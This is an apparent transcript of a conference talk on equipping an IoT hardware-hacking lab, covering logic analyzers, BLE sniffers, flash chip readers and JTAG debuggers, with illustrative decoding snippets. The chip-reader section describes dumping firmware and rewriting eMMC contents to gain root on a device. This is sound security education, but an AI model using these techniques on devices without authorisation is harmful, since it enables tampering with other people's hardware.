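Once you've tapped a UART with one of these adapters, the framing underneath is simple: the line idles high, then each byte is a low start bit, eight data bits LSB first, and a high stop bit (8N1). As a sketch of what the adapter is doing for you, here's a minimal software decoder for a line sampled once per bit period; the function name and sample data are mine for illustration, not from any vendor tool:

```python
def decode_8n1(bits):
    """Decode an idle-high 8N1 UART bitstream sampled once per bit period.

    bits: sequence of 0/1 samples. Returns the decoded bytes.
    """
    out = bytearray()
    i = 0
    while i < len(bits):
        if bits[i] == 1:           # idle line or stop bit: skip ahead
            i += 1
            continue
        frame = bits[i + 1:i + 9]  # 8 data bits, LSB first
        if len(frame) < 8:
            break                  # truncated capture
        value = 0
        for pos, bit in enumerate(frame):
            value |= bit << pos
        out.append(value)
        i += 10                    # start + 8 data + stop
    return bytes(out)

# 'A' = 0x41, sent LSB first: start(0), 1,0,0,0,0,0,1,0, stop(1)
samples = [1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1]
print(decode_8n1(samples))  # b'A'
```

Real adapters do this in silicon, of course; the point is that once you know the baud rate, there's nothing mysterious between the logic-analyzer trace and the bytes.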
People have seen the work that I did on inter-chip communication; I like to use one of these, and it works out pretty good for capturing multiple UARTs for analysis of data as it flows through a system. Also, let's go ahead and move on to logic analyzers. I want to point out that Jonathan is actually going to be speaking tomorrow. Is it tomorrow evening or tomorrow morning, Jonathan?

Yep, tomorrow evening.

And he's going to do a talk on using logic analyzers. So, there are a lot of different logic analyzers out there. I think Jonathan has one of these he's actually going to show you; here's another one. These are cheap, this is like 12 bucks, and it does like 24 megahertz. Another one that I have, this one is a Saleae; this is their four-channel one. It's no longer being manufactured, but Saleae had a whole stinking warehouse full of them, and they're selling them. These are more pricey, they're 100 bucks, but it's Saleae high quality. Now, what I use is the Saleae eight-channel. I think this is like $600; I think it's the 100 megahertz eight-channel, the actual Pro, and it works great for everything I'm doing in the lab. And if you're not doing this for a job, and you're just a hacker doing it for your education and learning, you can actually get an EDU version, which will save you a significant amount of money when it comes to logic analyzers. Also, some of the things you may want to consider: earlier you may have seen the oscilloscope that was in the back of my room. I have an old scope. I use it sometimes, basically for signal chasing, but other than that I don't use it that much for most of the tech that I have. But when you want one, it's nice to have one, and they come in a number of price ranges.
So, you know, you can get anything from the typical ones you run off your desktop or laptop with a small plug-in board, all the way to high-end digital scopes with built-in logic analysis in the thousands of dollars. The one I have is a Tektronix; I'm a big fan of Tektronix since I came from the military. I think mine was like five or six hundred dollars, and I believe it was a 15 megahertz box, and it works pretty good. So, moving on from there. Another area that you want to get into as a hacker is often the RF stuff. You want to start digging into RF. One of the big RF areas is often Bluetooth Low Energy. These are the go-to Bluetooth dongles; these are CSR 8510s. These are the ones that will work with pretty much any of the Bluetooth development software out there; they have the right chipsets in them. These only go up to, I believe, version 4.2. I don't think they'll support 5. I don't think I have anything here that actually supports 5 right now; it's something I need to add to my lab myself. So that's one of them. Another thing is the Nordic. Nordic makes a dongle that you can use with nRF Connect, their desktop product, and this happens to be it; I think I paid $25 or $35 for it. I would recommend having one of these for Bluetooth; it has a lot of cool capabilities. And there are a number of development boards and testing boards available out there that give you the ability to take what you're doing with Bluetooth to almost any level you want. Another device I have that I actually like pretty well is this Hollong; it was about $100, I think, and I've had it for a couple years. So hopefully they'll come out with a newer version that supports 5. But this gives you the ability, and it has to be run on a Windows box, to capture Bluetooth.
So it'll actually see the advertisements coming out over Bluetooth, and it will let you pick one of the devices out of the list of Bluetooth Low Energy devices. Once you pick it, it will start to output all that traffic to Wireshark directly. It'll actually capture the pairing process and the entire authentication process. I don't want to say man-in-the-middle, but it's capturing all of the data and outputting it correctly to Wireshark for analysis. I'd say it's one of the best ones out there. In RF, there used to be a BLE sniffer available that would run on a desktop; this thing's way better. It actually covers all three BLE advertising channels, so it picks up all the data and doesn't miss that much, which makes it a lot better. I would recommend that. And of course, if you get into some other stuff, having the Ubertooth One is probably good. I haven't used this in a while. I've heard people complaining that follow-up work on the software hasn't really been done, which is kind of sad, because I think it was a very brilliant, capable tool, but hopefully they'll continue supporting it and we'll see some new capabilities in the future. So that's a reference to that. Moving on from that: typically, I don't have a ton of things here. I have a YARD Stick One, which does sub-gigahertz capture. And of course, and I know I have one laying around here somewhere, though I have no idea where it's at, I'm terrible with my lab, I have a HackRF that may come in handy for people that really want to do the work dealing with RF communication. So I'd recommend buying what you can afford: find an area that fascinates you in hardware hacking, and spend as much in that area as you can afford for the best tools. I would recommend shopping around. Some of these tools here may have newer versions.
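Those captures land in Wireshark, but the advertising payloads themselves are easy to pick apart by hand: each advertisement is a run of AD structures, one length byte (covering the type plus the data), one AD-type byte, then the data itself. A small parser sketch, with names and sample bytes of my own choosing:

```python
def parse_ad_structures(payload):
    """Split a raw BLE advertising payload into (ad_type, data) pairs.

    Each AD structure is: 1 length byte (covering type + data),
    1 AD-type byte, then the data itself.
    """
    fields = []
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:            # terminator / zero padding
            break
        ad_type = payload[i + 1]
        data = payload[i + 2:i + 1 + length]
        fields.append((ad_type, data))
        i += 1 + length
    return fields

# Flags (AD type 0x01) followed by Complete Local Name (0x09) "IoT"
adv = bytes([0x02, 0x01, 0x06, 0x04, 0x09]) + b"IoT"
for ad_type, data in parse_ad_structures(adv):
    print(hex(ad_type), data)
```

Knowing this layout makes the Wireshark dissector output much less magical when you're staring at a pairing capture.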
There may be better released products out there. This is a constantly changing field. What I bought a few years ago doesn't necessarily meet the needs now in a lot of cases. I find myself, as I'm doing new projects and new testing, having to go out and buy new equipment and new hardware. It seems to be a never-ending process. It's kind of like being married and a homeowner: you're always looking for an excuse to buy new tools for around the house. It's the same way as a hardware hacker. You're never going to be content until you have all the tools ever made on the face of the earth. But shop wisely, and I think you can do pretty good gathering up the needed stuff to be able to do the work. There's one other area before we take a quick break and look at some questions. Let's not forget critical tools: the multimeter. Literally, I don't think there's ever been an engagement, or any testing, or any device I tore apart and hacked on, where I didn't use a multimeter. These are cheap; you don't need an expensive one. Mostly I use the continuity setting for tracing out runs on boards and stuff like that; it comes in very handy. I also use it for checking voltages prior to hooking stuff up, to make sure I'm matching the voltages correctly, because it can really screw things up if you get that wrong. Moving on from there, let's quickly cover the area dealing with debuggers. Matter of fact, let's stop right there, before we get into chip readers and debuggers, and see if there are any questions.

Oh good. Yeah, it looks like a couple popped up here. So the first question we have is with regard to the physical, non-RF signal quality we were speaking of earlier. You'd mentioned the oscilloscope.
And also, I know you mentioned that you aren't really going in depth with it these days because you don't really need it. So the question is: would your answer be that the Saleae does okay for that sort of thing, and would you recommend a Saleae over an oscilloscope?

The answer to that is yes. My go-to is the Saleae logic analyzer, 100%, now, for almost everything I'm doing; almost everything I'm looking at is digital. Saleae came out with, I'm not sure what the name was, I'm losing my mind here, just a second. Oh yeah: Logic, their Logic tool, which is what interacts with the Saleae. They came out with Logic 2, and the cool thing with Logic 2 is that it adds so many more features to the Saleae. One of those features is continuous streaming: instead of just capturing data, like you often do, this will let you loop that capture so it continues to run. I've found myself taking a logic analyzer and using it like a probe, looking for ongoing signals, timing signals, clock signals, and burst traffic, because I can easily stop on something and, as this thing continues to run, see the burst traffic. And finally, it gives me a way to do some digital signal tracing. Maybe it's not the most effective way, but I think it's the most cost-effective way. So I definitely recommend, if you're going to spend the money, buy yourself a good logic analyzer. Besides the multimeter, it is the item that I inevitably use on every engagement and every test that I do. Any other questions, or is that it?

That's it.

All right, so let's jump into chip readers. So, say you happen to have a device with a flash memory chip, and you want to be able to get the data off that flash memory chip. What do we do it with? There are a lot of inexpensive solutions out there. This one here is an actual TL866 Plus.
This comes with a slew of sockets that plug in. This is like a TSOP socket, and there are eight-pin and 16-pin sockets, and the list goes on and on; there are like 20 or 30 sockets you actually get with the kit that I purchased. That one there is, oh gosh, there you go, a WSON-8 socket. So you drop the chip in. These are a little more pricey, but the TL866 itself is not that expensive; I think I paid 130 bucks for the one I have here. Although, when you buy this, it comes with this particular TSOP-48 socket, and this will not work for all TSOP-48s, which are typically NAND flash chips. So you need to go out and buy this one to go with it, and you can get these off AliExpress or maybe some other sources. And this is, let me get it right here, the TSOP-48 NAND socket. Typically, this is the socket that's used on the chips that have larger memory; when you start getting into 128 meg, 256 meg chips and higher, you're going to go over to this socket here. That seems to be the case. So that's one of the readers. Like I said, I have several chip readers. I can't remember the number this covers; I think it's like seven or eight thousand different chips that are actually supported by it. Does it cover every chip that I encounter? The answer to that is no. Does it cover a large number of them? Yes, it does. It probably covers two thirds of the ones I come across. One of the other chip readers I have is the RT809H. Here it is, similar, a little bigger physical construction. This one comes in handy. You can use the straight-wired sockets on it, so all of the inline sockets that came with the TL866 that are pin-for-pin wiring and don't contain any kind of circuitry will work on this. But the TSOP-48 ones actually have circuitry built into them, so you have to buy a socket that will actually work on it.
And this one is a straight pin-for-pin socket. I use this reader typically as a backup. There are times the TL866 doesn't work or doesn't support what I'm looking for, so I jump over to this one, and it works pretty darn good. You can also get various sockets for it; here happens to be one, and this was like a $40 socket. This is a BGA socket, a 63-ball BGA NAND flash memory socket. I think I paid $45 and had it shipped over from AliExpress in China. The crazy thing is I ordered it right when this whole COVID thing hit the fan, so it took like two months to get to me, versus the typical 30 days or shorter that I usually have to wait. So that's one of the readers. Some of the other readers I have in my arsenal here deal with embedded multi-chip packages and embedded multimedia controllers (eMMC). You find these a lot when you deal with embedded systems, and especially some consumer-grade IoT. These are for reading BGAs. This one is for an embedded multimedia chip, a 153-ball BGA. So you open it up, you drop the chip in there, plug it in (it's USB 3) to your computer, hit this button here, and that chip will mount up just like a file system. It'll mount up just like an SD card will, and most of the time it'll actually mount the entire file system on the device. From there you can quickly recover the data, and sometimes you can alter the data. In one of the exercises I did, I actually used this to pull the data, alter the data, and then write it back to the actual chip, and then reballed the BGA and put it back on the device to gain root-level access. So these are great, and they come in a number of different sizes. That's known as an embedded multi-chip package type thing; again, you'll find these in a lot of devices, and it means the chip contains both RAM and flash memory. But these ones are kind of pricey, like $135. There is a cheaper version.
This is pretty much the same thing, but it's done up just like an SD card, so you just plug it in like an SD card into your computer and it'll mount the chip up just like a file system. These ones are a little cheaper; I think they're well under $100, like 90 bucks or something like that. Also, if you need to deal with embedded multi-chip packages or embedded multimedia chips, I would recommend doing a little googling, because people have actually built readers like this example here. So there are ways to build these. Of course, you may have to dead-bug the chip, which means you're going to need a good microscope, because you end up soldering to the pads of the chip on the underside. There are only like four or five connections that have to be made on the chip, and you can literally read it. There's a lot of documentation out there, so you can take the hacker route and save yourself a lot of money, but again, it'll take a lot more time. So, any questions there on chip readers? Again, most of these chip readers were $120 to $140, right around there.

One question that came up, and I missed a little bit of backfill, I do apologize. One question that came up earlier is: is it actually worth picking up an old bench-top logic analyzer off eBay, or going with some of the newer USB tools? Cost is a limiting factor for this individual.

You know, I don't know enough about any of the bench-top logic analyzer tech that you're talking about. I haven't worked with any of those; typically, most of the stuff I deal with is the USB stuff. I mean, if you're looking for a logic analyzer just to give it a try, I'll be honest with you: a lot of these smaller ones are 24 megahertz. I have not used this one, but obviously, at $12, from a logic analyzer standpoint it gives you an entry point just to get familiar.
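One concrete first job for a cheap analyzer like this is sizing up an unknown UART: the shortest gap between edges in a capture approximates one bit period, and snapping 1/period to the nearest standard rate gives you the baud. A sketch; the function name and the timestamps are made up for illustration:

```python
STANDARD_BAUDS = [9600, 19200, 38400, 57600, 115200]

def guess_baud(edge_times):
    """Estimate UART baud rate from logic-analyzer edge timestamps (seconds).

    The shortest gap between transitions approximates one bit period;
    snap 1/period to the nearest standard rate.
    """
    gaps = [b - a for a, b in zip(edge_times, edge_times[1:])]
    bit_period = min(gaps)
    raw = 1.0 / bit_period
    return min(STANDARD_BAUDS, key=lambda b: abs(b - raw))

# Edges spaced at multiples of ~8.68 microseconds (115200 baud)
edges = [0.0, 8.68e-6, 26.04e-6, 34.72e-6]
print(guess_baud(edges))  # 115200
```

Logic 2 and similar tools will do this for you with an analyzer plugin, but doing it once by hand makes it obvious why a 24 MHz sampler is plenty for a 115200-baud console.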
And I think the Logic software put out by Saleae will actually work on these, and there are a couple other options. Jonathan's going to talk about this in more detail tomorrow, so definitely swing by his presentation. If money's limited, I mean, can you come up with $12 to give one of these things a try? I bet you, nine times out of ten, on most standard consumer-grade IoT, this is going to be fine. I've only run into issues when I'm dealing with commercial-level devices, where a megahertz rating like this would not have worked. So, just an example.

That makes sense. And another backfill question here. Asher says: such a great lab, Darryl. One question: what do you use for on-chip debugging, other than the Shikra?

Oh, on-chip debugging. Yeah, we're actually getting into that next. If you want to do on-chip debugging, or pull firmware off the chips and all that type of stuff, that's the next section we're going to dive into.

Okay, perfect. And I think we'll put a pin in that question, because it sounds like it'll be answered. The next question here reads: what are these readers used for? What are you reading off these chips? Sorry, noob. Thank you.

Oh, there's nothing wrong with that, man. I mean, we were all learning at one time. Five years ago, I couldn't have told you any of this stuff at all. So, what we're doing is this: these chips I'm talking about are flash memory chips. This is where the embedded device holds its operating system; it's also where it holds configuration settings and data associated with the functionality of that device. So if you want to be able to pull off the firmware for some kind of offline analysis, say you want to do some offline debugging with IDA Pro or something like that, then you need to be able to extract the firmware. And to extract the firmware, you need to gain some level of access. Chip readers come in handy for doing what I consider off-board reading.
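Whichever reader you use, a useful first pass over the resulting dump, before loading anything into IDA Pro, is a block-entropy scan: values near 8 bits per byte usually mean compressed or encrypted regions, while low values point at code, tables, or erased flash. A quick sketch; the function names are mine, not from any particular tool:

```python
import math
import os
from collections import Counter

def entropy(block):
    """Shannon entropy of a byte block, in bits per byte (0..8)."""
    counts = Counter(block)
    total = len(block)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

def scan(dump, block_size=1024):
    """Print per-block entropy across a firmware dump."""
    for offset in range(0, len(dump), block_size):
        block = dump[offset:offset + block_size]
        if block:
            print(f"0x{offset:06x}  {entropy(block):4.2f} bits/byte")

# Demo dump: an all-zeros block (entropy 0) followed by a random
# block (entropy close to 8, like compressed or encrypted data)
scan(bytes(1024) + os.urandom(1024))
```

Tools like binwalk do this (and much more) out of the box, but a ten-line scan is often enough to tell you whether a dump is worth digging into at all.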
So you de-solder the chip, remove it from the board, drop it into the reader, dump all of the memory out of that chip, and then you solder the chip back onto the board. Since I'm fairly good at soldering and de-soldering, I have a tendency to do just that: I will often literally pull the chip rather than trying to read it in-circuit, because I've found it's sometimes much easier. Not always, but in a number of cases. The only time it's more difficult is when you're dealing with a ball grid array chip, a BGA, where the pins are underneath; when you remove it, the complexity of putting it back on is fairly high. So hopefully that answers the question.

Makes sense. And one final question here. Zero is asking about the Flipper Zero. What are your thoughts on the upcoming Flipper Zero? Is it a great asset or a gimmick, Kickstarter problems aside?

Flipper Zero. I don't think I've seen that. Have you seen that? Have you looked at it?

Yeah, it looks super interesting, actually. I'm additionally not familiar with it, but it looks super slick. It looks like you can do a lot of hardware analysis with it. I think it looks kind of cool. It's very powerful for sub-one-gigahertz. From what I'm seeing, it looks somewhat similar to the YARD Stick One with maybe a few additional features, but it looks pretty slick in my opinion.

Yeah, like I mentioned, there is always new tech being developed. Often I don't dig into those unless it happens to be on my table or something I need to work on, and then I go out looking and try to find the right tool, the right solution, the one that's going to help me do the job the easiest and the quickest. So hey, great, thanks for bringing that up. I'll have to look at it once we get offline here.

Yeah, and Darryl, we actually had the inventor of the Flipper Zero present at our event back in May.
So anyone who's listening should check that video out; he goes through all the features and the story of why he built it.

Outstanding, Sam. Thank you very much. We'll check that out. So, moving on from there, I want to get into some debugging. There was an area I did miss earlier, and we may jump back to it at the end if we have time, but we'll start with debuggers. The first thing I want to look at is not necessarily a debugger, but pretty darn close to it. This is fairly pricey, about $150 to $170: the JTAGulator. I have not used this in a while, so don't ask me why; I guess I haven't needed to figure out where JTAG connections are in a while. But if you're in a bind and you need to figure out whether there are any exposed JTAG connections to a chip, this is the tool for doing it. You just plug all these leads in, hit reset, and go. There's software you run on this thing that goes through all of the testing sequences, for all the different wiring combinations you could possibly generate by plugging it in, and checks for valid JTAG connections. I don't use it for UART; that's typically easy enough to spot with a logic analyzer fairly quickly. But it's a good tool to have in your arsenal, especially if you're doing a lot of debugging on devices where you can't identify whether JTAG is available. They also added some features that will go through and do I/O testing: it'll feed in a series of test data and capture what comes back, identifying the various I/Os on a processor. That's also a great feature. So when it gets into, not logic analyzers, but debuggers: how can I interact with the chip? How can I interact with the processor? And in some cases, how can I pull firmware out of a processor that actually has the flash in the processor, which seems to be the thing I most often do.
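When the JTAGulator does find a live TAP, the 32-bit IDCODE it can shift out already tells you a lot about the part. The field layout is fixed by IEEE 1149.1, so decoding it is a few shifts; this sketch (names mine) uses the well-known ARM debug-port IDCODE as an example:

```python
def decode_idcode(idcode):
    """Break a 32-bit JTAG IDCODE into its standard fields.

    Per IEEE 1149.1: bit 0 is always 1, bits 1-11 are the JEDEC
    manufacturer ID, bits 12-27 the part number, bits 28-31 the version.
    """
    return {
        "version":      (idcode >> 28) & 0xF,
        "part_number":  (idcode >> 12) & 0xFFFF,
        "manufacturer": (idcode >> 1) & 0x7FF,
        "marker_bit":   idcode & 0x1,   # must be 1 for a valid IDCODE
    }

# 0x4BA00477 is the IDCODE reported by ARM's CoreSight JTAG debug port;
# its manufacturer field decodes to 0x23B, ARM's JEDEC code.
print(decode_idcode(0x4BA00477))
```

Matching the manufacturer field against the JEDEC list is often the fastest way to figure out whose silicon you're actually talking to on an unmarked or relabeled chip.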
I have a whole slew of debuggers; I've probably got a dozen of them laying around here for various things. But there's one that is my go-to, at least for ARM processors, and that's the J-Link. The Segger J-Link is a great product. This is the commercial version; these are kind of pricey, and as the speed and capabilities of the hardware go up, the price goes up and up. I think this one was like $600, and they can easily go upwards of $1,000 or more. But there is hope: if you're interested in the Segger J-Link and you are basically a student or somebody learning, you can buy the EDU version. When I first started learning and wasn't using it for commercial use, I purchased that; it was like $70 and has all the similar capabilities. Its data read speed is probably not as fast, but it's pretty good. Another habit of mine is that I always tape the pinout for all of the pins to the back of some of these devices, because I rarely throw the 20-pin plug on there and use it. I often use single jumper wires, because I use this not only for standard JTAG, but for Serial Wire Debug and cJTAG. It will do cJTAG also, which is a two-wire variation of JTAG, similar in spirit to Serial Wire Debug. So if you're like me and you can't memorize all the pins on everything, printing out the pinout and sticking it on the back is a nice little trick I use to speed me along. Again, it's a great product, and for mainly ARM processors it's my go-to. But I will also use various debuggers for different processors. For TI chips there's the CC Debugger; I can't remember what this cost, $20 or $30, it wasn't much. It happened to be a case where I was dealing with some TI chips, and I figured I'd just buy the thing, put it in my lab, and have it. Another one, which we demoed last year, deals with the XDS110, which is another TI debugger.
And I wanted to expose people to the XDS110 from a debugging standpoint, but I didn't want to buy the full-blown one; that's like $110 or $120. It turns out they made a small development-kit version for the SensorTag, and the one you buy for that is basically a stripped-down model. There's no case, and some features are turned off, but it works the same way. This was like $15 versus $100, and it worked pretty good. I got this idea because I was doing some research on a TI chipset for a vendor, so I bought the development kit, and the development kit had an XDS built into it, which got me interested in doing this; that's why I shared that stuff last year and wanted people to do the hands-on. Now, I have a number of debuggers around here, but you know, a debugger is what it is. Typically, when I encounter a chipset, the first thing I ask is: if I were a developer on this product line, for this chipset, how would I do it? What product would I use? What does the vendor recommend for interacting with their hardware and their chips? And then I go check it out. Do they have guidelines for using a J-Link? Then I use a J-Link. Do they have a specialized debugger, like PIC processors do, which use in-circuit serial programming (basically SPI)? If that's the case, then I get those; I have several laying around here, the PICkits, as they're called. So I try to find out what the developer community uses for a particular product, and if I can afford it, or it's inexpensive, I buy that, or I buy the next-best alternative to actually use. That's typically the approach I take. I've found that if I'm trying to deal with a chipset and I'm using somebody else's debugger, it has a tendency to not always do what I expect it to do.
It doesn't always give me the information that I get from the development community or from the vendor on the product, and it adds a level of complication. I'm able to find way more resources if I use what the development community uses on that product. But realistically that's not always feasible. There have been a number of times where I've gone, hey, here's a chip, you go out and try to find out what the development community is using for it, and find out it costs $10,000 and you can only buy it from the vendor. In cases like that, hey, if it's an ARM, it's an ARM; if it's something else, go all the way down and use one of these, and use OpenOCD if you have to, whatever it takes. But I tend to first dive into what the actual producer uses. I want to move on real quick because we're running a little behind; well, matter of fact, never mind, we can get to that during questions. It looks like one question cropped up here. Josh asks: do you happen to have any books, videos, or other learning material that you recommend to start learning IoT hacking? Oh gosh, that's kind of a hard one. I'm not a big book person. To be honest, I'm definitely a Google and YouTube kind of guy. For everything I've wanted to learn, for example, I wanted to learn how to re-solder a TSOP-48 pin chip back onto a circuit board, and I'm like, man, this is going to be hard, I can't just go solder each pin. So I went on YouTube and looked it up, how do I do this, and there were three or four videos out there, and I watched those videos and said, well, I'm going to do it the same way. If I want to learn how to use UART, I go check out some of the videos on finding UARTs and identifying UARTs; same way with logic analyzers. That's typically the approach I take, and I still do that to this day.
When I'm working an engagement or testing a product and I go, hmm, how do I interact with this, I haven't done this before, because even though I've been doing this for years I constantly encounter things I haven't encountered before, first I go out and find out who else has done this. Has it been done before? Has anything similar to it been done before? That's kind of my approach. And I know there are a lot of learning kits out there, but I'd also recommend, gosh, where is that, looking at some inexpensive products just to play around with. I'm going to throw some pictures up here, like these MT300 mini-router type things. That's one of the things out here; well, that's one thing about my lab, it's like a ton of gear. So this one is a little router device, and we have these chips on here, so it has a lot of things you can interact with. There's Ethernet, there's USB, and it actually has a UART. The UART is actually marked on here: if you look, it says TX and RX, and then I found the ground. This runs OpenWrt. It has a flash memory chip right here, so here's a chance to figure out how to get the memory out of the device. Here's a chance to play with this; in this case root doesn't have a password on it, so as soon as you get the console you're going to have root-level access, but you can change that and then try to get around it. This device is like 20 bucks. I'd recommend getting something like this and starting out by just going: hey, this is a MediaTek chip, what does that mean? This is a RAM chip, find the data sheets. This is a flash memory chip, find the data sheets. Read those data sheets and kind of learn and play around and experiment. And if you screw it up, throw it in the trash can and go spend another 20 bucks. Hopefully that answered the question.
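If you pick up a cheap router like the one just described, here is a minimal sketch of getting at that marked UART from a Linux box with a USB-to-UART adapter. The device path and the baud rate are assumptions; OpenWrt consoles commonly run at 115200 8N1, but check the board's documentation or try other common rates.

```shell
# With the adapter wired to the board's TX, RX, and GND pads:
ls /dev/ttyUSB*          # find which ttyUSB node the adapter enumerated as

# Attach at a guessed baud rate; 115200 8N1 is a common embedded default
screen /dev/ttyUSB0 115200

# If the console prints garbage, detach (Ctrl-A k) and retry at 57600 or 9600
```

Once the boot log scrolls by and you land on the unpassworded root console, you have exactly the kind of playground described above for practicing firmware and memory extraction.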
Okay, here's another one, but I don't think the GL Mango is even available anymore; it's the same product, just relabeled differently. Another question cropped up here, kind of an extension of that question: do you have any go-to YouTube channels, do you follow anyone on social media? Oh gosh. Yeah, for social media I am a Twitter guy, so you can find me on Twitter. My handle is Percent_X, that's P-E-R-C-E-N-T underscore X. Please follow me. If you're one that tweets a lot of political stuff, there's nothing wrong with that, I'm just not a big fan of it, just to be aware. I want to see mostly technical stuff, so if you're doing technical stuff out there, that's kind of cool, I'll probably follow you back. But yeah, that's one thing I do. I do not follow any particular YouTube channels. I'm usually all over the map with whatever I'm working on at the time, and if I need to learn something specific I go out and search, and I never look at one single example. If there's a dozen examples out there, I'll usually look at three or four of them, get three or four different viewpoints on how to approach something or how somebody's done it, and then experiment with my own ways and methods and try to build from that. Also, at Rapid7 I've put out a number of blogs, so if you use my name, Deral Heiland, and search for the Rapid7 blogs, I think we put out a whole series last year on pulling firmware from microcontrollers, like four of them, covering four different types of microcontrollers, four different software packages, four different debug-type devices. So every once in a while I'll do that type of stuff too. Okay, so I want to move on to odds and ends. This is kind of a big one. When you're doing work on devices, it often comes down to needing a lot of strange stuff. The first one is wire. I don't know how good the video is out there, but this is 40-gauge wire. And to be absolutely honest about it, I hate this shit.
But this stuff comes in handy for soldering into microscopically small circuits to tap into them. Currently I'm working on a project where I have to tap into an Intel i3 processor, and the only way to do it is through pads that are like 0.3 millimeters, so I am actually using this under a microscope and soldering it up. At the end of this I'll show you what I attach it to when I'm done, which is a lifesaver. So that comes in handy. If I'm doing something bigger from a wire standpoint, I use this wire-wrap wire; I don't even remember the vendor. I found it comes in all of these different lengths. This is covered with a really fine plastic coating; that 40-gauge wire earlier was covered with lacquer, a real thin coat of lacquer, to keep it from shorting. Now, this stuff will melt what's on the outside of that. But when you're looking for something like 30-gauge wire, you need to find wire wrap. If you buy standard 30-gauge wire, the insulation around the wire will be thicker than the wire itself and will get in the way when you're trying to solder to small circuit pads to tap into them. The other thing is, when you open up a device you start thinking about headers; you need to attach headers. This became a nightmare over the years, or at least early on when I first started, because I was seeing all kinds of stuff. I went out and got samples of 2.54-millimeter headers, so these can be plugged into the board and soldered in, and then you just plug into them wherever there are header footprints. What if there happens to be a dual header? So then I bought some dual headers to have those; I have boxes of these things laying around. On top of that, what happens if it's a surface-mount header for 2.54 millimeters? If you look at this, see how the bottom is sticking out there, it's actually gull-winged. So there you go. And then we do the same thing for 1.27 millimeters, single row.
Double row. These are the most common, and trust me, there are people that produce other headers where you want to kill them when you get them, because those things won't fit a gull-wing footprint. So yeah, I went out and purchased all of this stuff over time; I didn't do it in one day. It's like, hey, I need headers, they're 1.27, I need gull-wing headers, and then I went out and bought them. The other thing that is a lifesaver is glue. It comes in really handy, because when you're attaching small wires to a board and you snag the wire or pull the wire, you could easily rip the pad clear off the board, which will happen to you anyway, but this will help prevent it. This glue here works like a champ. So here is some 30-gauge wire that I've attached to this device here, and you can see, hold on a second, I'm looking for a poker here. Right here you can see this is glue. I put a dab of glue on there and it holds the wires and prevents me from tearing the pads off this circuitry. It works like a champ. If you need to remove the glue, it peels right off; it takes a little force, but it'll peel cleanly off the circuit board. It's actually brilliant for what you need to do. Some of the other things you're going to need: you're going to need wire. These are jump wires; you can get them male-to-male, female-to-female, and they just peel off. I have bundles of these, and when I'm done using one, I throw it away, because if you keep plugging it in and plugging it in, by the end of the day it'll start weakening to the point where it will give you problems if you keep trying to use it. There's nothing worse than losing three or four hours trying to figure out why something isn't working and finding out your plug is just worn out, so I usually get bundles of these. And then you'll find them scattered all over the floor, because I just throw them on the floor when I'm done.
I'd also recommend breakout boards, quick breakout boards for doing various projects and stuff like that; that's kind of sweet. And then let me see. Oh gosh, here's some stuff I bought on a project a while back. I ran into a project where I needed USB, so I literally went out and bought USB breakouts. You can buy these little kits for like five, six bucks, and they give you the ability to do USB breakouts so that you can solder up connections on these things and be able to tap into various USB lines. The reason I needed that: it turned out that the device I pulled apart, an industrial device, had a solid-state drive in it, and the solid-state drive wasn't ATA, it was basically USB, and it had kind of a weird wire-out structure. So from here I was able to jumper it out the way I wanted it to fit USB properly, and was able to use that to tap into the actual device and read the data off of it pretty effectively. So that worked pretty well. These next ones are a little expensive, but they've come in handy a few times; these are micro-grabbers. I can use them on a logic analyzer or some other kind of test equipment. I have a set of these that I've put together; I think they were like 20 bucks a piece, but they have a 0.5-millimeter pitch, which comes in handy for small stuff. And then the big item, and I think this is really critical: this is a test board. I built these, and I would recommend building test boards to meet your particular needs on the projects you're working on. It'll turn out to be vital. So if we look at this test board, we have two sides. We can take the wire and hook into here; these are screw terminals, so you can screw the wire in here and instantly you have two headers to put test equipment on. This one over here is similar. This one has jumpers in the middle.
This one's isolated with a switch, and these are isolated with jumpers. So once you attach the jumpers or throw the switch, you get connections all the way across. If it's turned on, then I basically get four headers I can tap into. This also makes inter-chip communication testing possible, which I've done: I come off the circuit board here, route through here, and go back to the circuit board, and then I cut the traces on the circuit board, making all the traffic flow through this. It gives me the ability to turn the flow on a circuit board on and off for analysis, and the ability to hook up multiple pieces of test equipment for analysis. And again, I built these. You can see where they're broken right here so that they require a switch or a jumper to bridge them. These come in extremely handy. I've built four or five different ones, but having these screw terminals is a lifesaver for connecting things up. So I'd recommend building some of your own jigs and test equipment. Any questions? It looks like a high-level question cropped up here, with regard to earlier, when you were speaking about the FTDI devices. The question is: what software do you use in order to start talking to these devices? Again, this is with regard to when you were talking about the Shikra, those types of hardware devices. So if you're using the Shikra and you're doing JTAG, then OpenOCD is probably one of the best ones you're going to use. When it comes to UART, there are so many console programs out there that it's literally hard to say which one is the best. I have a tendency to use, gosh, CoolTerm, and I use it on my Mac. If you're on a Linux system, I would just use screen for interacting with a USB UART connector, as an example. For the logic analyzers, the manufacturers produce their own software; Saleae's is called Logic.
There's the older version and there's Logic 2, which is pretty good. So for standard UARTs, again, there are tons of programs out there; find the one that works best for you, or if you're on a Linux box, just use screen. Screen has the ability to interact with ttyUSB0, ttyUSB1, however many UARTs you have connected up, and also to set the associated baud rate right within screen. When you get into debuggers, like the J-Link, J-Link produces its own software, same way with the CC Debugger. Also, individual manufacturers of certain chips will produce their own software to interact with their chips over J-Link. Nordic is one of them: Nordic produces software to connect to their nRF51 and nRF52 series chips. You can get it as a command-line tool or with a user interface, and it actually leverages the J-Link. So a lot of the manufacturers will also produce custom software to interact with their chips on top of the standard debuggers that are available out there. Any other questions? That is it. All right.
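As a footnote to the Nordic tooling mentioned above, here is a hedged sketch using Nordic's command-line tool nrfjprog, which talks to nRF51/52 chips over a J-Link; I'm assuming this is the CLI being referred to, and the addresses and byte counts are illustrative only.

```shell
# Dump the code (flash) region of an nRF52 over a J-Link with Nordic's CLI
nrfjprog -f nrf52 --readcode flash_dump.hex

# Read the first 16 bytes of memory directly, e.g. the reset vector area
nrfjprog -f nrf52 --memrd 0x00000000 --n 16
```

This is exactly the pattern described in the talk: the vendor CLI sits on top of the Segger J-Link hardware rather than replacing it.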
This learning session will focus on the subject of building an IoT hardware hacking lab. During this learning session, various tools and technologies will be shown and discussed that are needed for physical disassembly, soldering, debugging, and analysis, covering everything from basic entry-level equipment to the more advanced lab equipment needed and used. After each learning objective we will have a Q&A session.
10.5446/50729 (DOI)
